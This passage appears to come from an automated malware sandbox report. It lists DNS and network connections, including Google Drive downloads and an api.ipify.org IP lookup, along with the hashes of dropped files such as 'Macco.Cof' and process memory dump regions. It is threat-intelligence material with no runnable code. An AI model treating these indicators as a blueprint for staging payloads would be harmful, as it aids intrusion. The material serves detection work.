| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
memory/5036-0-0x00007FFC7BB43000-0x00007FFC7BB45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g2cq0i04.2vu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5036-1-0x000001A61D080000-0x000001A61D0A2000-memory.dmp
memory/5036-11-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp
memory/5036-12-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp
memory/2400-15-0x0000000004810000-0x0000000004846000-memory.dmp
memory/2400-16-0x0000000004EE0000-0x0000000005508000-memory.dmp
memory/2400-17-0x0000000005540000-0x0000000005562000-memory.dmp
memory/2400-18-0x00000000056E0000-0x0000000005746000-memory.dmp
memory/2400-19-0x0000000005750000-0x00000000057B6000-memory.dmp
memory/2400-29-0x00000000058C0000-0x0000000005C14000-memory.dmp
memory/2400-30-0x0000000005D90000-0x0000000005DAE000-memory.dmp
memory/2400-31-0x0000000005E50000-0x0000000005E9C000-memory.dmp
memory/2400-32-0x00000000073F0000-0x0000000007A6A000-memory.dmp
memory/2400-33-0x0000000006340000-0x000000000635A000-memory.dmp
memory/2400-34-0x0000000007050000-0x00000000070E6000-memory.dmp
memory/2400-35-0x0000000006FE0000-0x0000000007002000-memory.dmp
memory/2400-36-0x0000000008020000-0x00000000085C4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Macco.Cof
| MD5 | 7f40a091f1c133333e814a35fe64d807 |
| SHA1 | 8d278db73f3e270f33b743f358a9cfa1e3bdbe37 |
| SHA256 | 5454057fe5e349e2139169937a8bb6d34b4e6e6ba83bccebaa4e701f3ccc3edb |
| SHA512 | d930b6c0ca34da1f9cad04b5b65218bc98dde299c85627c659ae5a2f25c5321f353f1b826ee4e8bebfa32a2b7184c7a5c69c9e6a4fff42e9232f8604d511dfcb |
memory/2400-38-0x00000000085D0000-0x000000000CED9000-memory.dmp
memory/5036-39-0x00007FFC7BB43000-0x00007FFC7BB45000-memory.dmp
memory/5036-40-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp
memory/5012-54-0x0000000000AC0000-0x0000000001D14000-memory.dmp
memory/5012-55-0x0000000000AC0000-0x0000000000B02000-memory.dmp
memory/5036-58-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp
memory/5012-59-0x00000000247B0000-0x0000000024800000-memory.dmp
memory/5012-60-0x00000000248A0000-0x0000000024932000-memory.dmp
memory/5012-61-0x00000000247A0000-0x00000000247AA000-memory.dmp